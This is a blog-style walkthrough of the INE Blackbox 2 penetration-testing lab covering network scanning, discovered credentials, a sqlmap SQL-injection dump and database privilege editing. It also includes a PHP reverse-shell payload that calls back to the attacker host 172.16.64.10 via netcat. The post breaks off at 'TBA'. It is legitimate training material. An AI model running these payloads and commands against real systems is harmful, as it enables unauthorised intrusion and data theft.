INE Blackbox 2
Before starting I'd like to let you all know that it's ALWAYS a good idea to run nmap on sudo and scan for ALL ports when solving these INE-boxes, I wasted way too much time being stuck with credentials and unable to continue due to lack of information from regular nmap scans. I'm going to try to skip all those struggles on this post but we'll see how it goes!
Just like on Blackbox lab 1 the goal is to get access to flag on each machine on the network. Running nmap we can see that network has 4 boxes available.
nmap -sn -T4 172.16.64.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-06 17:56 EET
Nmap scan report for 172.16.64.81
Host is up (0.14s latency).
MAC Address: 00:50:56:A2:3A:86 (VMware)
Nmap scan report for 172.16.64.91
Host is up (0.17s latency).
MAC Address: 00:50:56:A2:AC:E7 (VMware)
Nmap scan report for 172.16.64.92
Host is up (0.17s latency).
MAC Address: 00:50:56:A2:98:52 (VMware)
Nmap scan report for 172.16.64.166
Host is up (0.14s latency).
MAC Address: 00:50:56:A2:C6:4D (VMware)
Nmap scan report for 172.16.64.10
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 5.04 seconds
Once again I figured it would be a goods idea to start from first machine while running scans on other machines on the background.
By running nmap on First box (ip 172.16.64.81) I found out that the box has three ports open: 22(ssh), 80(http) and 13306(mysql). Without any creds to try on mysql or ssh I started to examine http first. Home page had Apache welcome page without anything unsual about it so it's time to run some dirbuster!!
root@kali:/home# dirb http://172.16.64.81
Dirb found /webapp -folder which contained a ProjectSend- file sharing service. I tried to login via some common creds (admin admin etc..) with no luck and after navigating to forgot password- link I was redirected to cms.foocorp.io which resulted to 404 error. So I added that entry to /etc/hosts file and was able to continue. While I was having my wild adventure on this old and terrible looking landing page trying to hack my way in dirb found another folder inside webapp: /img/custom which peaked my interest. After navigating there I found an users.bak file with two user-password entries.
john1:password123
peter:youdonotguessthatone5
Hell yeah! Of course right after that I tried logging in with both credentials and got in with john´s but after that server returned with error 500. At first I thought there was something wrong with my lab and tried to restart it and even commented out my /etc/hosts-entry without any luck. After struggling a bit it was time to look what exactly happens after logging in so it was time to open up BurpSuite and intercept the request! There were some redirects after logging in and after one of them server returned some very interesting headers:
HTTP/1.1 302 Found
Date: Fri, 05 Feb 2021 17:12:10 GMT
Server: Apache/2.4.18 (Ubuntu)
X-DB-Key: x41x41x412019!
X-DB-User: root
X-DB-name: mysql
Location: 500.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
While now it seems obvious to try them on Mysql my initial nmap scan did not find mysql running on server so I spent some time struggling and trying god knows what to make some sense of things. But after running nmap again and finding MySql port the flag was found from the database and this fucking machine was done!
Second box (ip 172.16.64.91) had only http running and dirb found nothing so I skipped it for now and went for third one (172.16.64.92). It had three ports open: 22(ssh), 53(domain?) and 80(http). After browsing to webpage a JavaScript alert spawned on my face so I thought it would be good idea to check source code more carefully. There was some Javascript file making a request to odd end-point with some query params so i navigated there
alert("Loaded!");
<!-- pre-login collect data -->
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
console.log("OK");
} else {
console.log("Error!");
}
xhr.open("GET", "http://127.0.0.1/72ab311dcbfaa40ca0739f5daf505494/tracking2.php", true);
xhr.send("ua=" + navigator.userAgent + "&platform=" + navigator.platform);
}
I played with the query params a bit but couldn't get anything other than some XSS-injection through platform-param. Looking at the url again the php file has "2" on it so I figured there could be either tracking1.php or tracking.php file on the server too. And after navigating to tracking.php end-point I found a form that search's records from database. After some basic tests it was obvious that the form was vulnerable to SQL-injections.
Given that this is a novice-level lab it would have been possible to dump whole database even for me I decided to use sqlmap to make my life easier. I intercepted the POST-request in a file request.txt and ran following sqlmap command to get tables from the database:
sqlmap -r request.txt -p id --dump
Sqlmap was also able to decrypt hashes of two users: tracking1 and tracking2 but not able to crack two other users which also had admin-flag on. I tried decrypting hashes with john and rockyou-wordlist with no luck so I grabbed tracking1-user credentials (12345) and started to look for login-page… And it was on /login.php :D
After logging in i was redirected to page which said that the user is not authorized to use the console. I looked up source code and found… DATABASE CREDENTIALS! THIS LAB IS JUST AS DUMB AS THE PREVIOUS ONE! So I took the credentials, logged in to database and updated tracking1-user to be admin. Logging in and out as tracking1 I was now redirected to page with some kind of custom admin console.
I tested some basic php commands and they executed so it was time to get a reverse shell. Once again I set up netcat listener with
nc -lnvp 1337
And posted the form with payload
$sock=fsockopen("172.16.64.10",1337);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);
And got in. I'm not that familiar with all that dns and networking stuff so I uploaded linpeas-enum script to make my life a bit easier. After running it and taking a look of findings there was some kind of dns-configuration on another ip-address:
172.16.64.91 75ajvxi36vchsv584es1.foocorp.io
Without thinking about it too much I added the entry to my /etc/hosts file and after grabbing the flag started to take a look of the new vhost.
TBA